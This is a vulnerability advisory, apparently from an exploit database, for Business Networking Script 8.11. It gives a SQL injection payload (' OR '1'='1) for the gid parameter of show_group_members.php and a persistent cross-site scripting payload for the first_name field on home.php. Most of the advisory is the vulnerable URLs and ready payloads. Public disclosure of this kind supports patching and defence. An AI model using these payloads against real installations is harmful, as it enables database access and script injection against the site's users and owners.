Business Networking Script 8.11 Cross Site Scripting / SQL Injection

2017.01.17
Credit: Ahmet Gurel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title : ----------- : Business Networking Script v8.11- SQLi & Persistent Cross Site Scripting # Author : ----------------- : Ahmet Gurel # Google Dork : --------- : - # Date : -------------------- : 16/01/2017 # Type : -------------------- : webapps # Platform : --------------- : PHP # Vendor Homepage : http://itechscripts.com/business-networking-script/ # Sofware Price and Demo : $299.00 http://professional-network.itechscripts.com ########## 1-SQL Injection ########## ##### Vulnerable Parameter Type : GET ##### Vulnerable Parameter : gid ##### Vulnerable URL : http://localhost/[PATH]/show_group_members.php?gid=[SQLi] ##### SQLi Parameter : ' OR '1'='1 ########## 2-Persistent XSS Payload ########## ##### Vulnerable URL : http://localhost/[PATH]/home.php ##### Vuln. Parameter: first_name= ##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top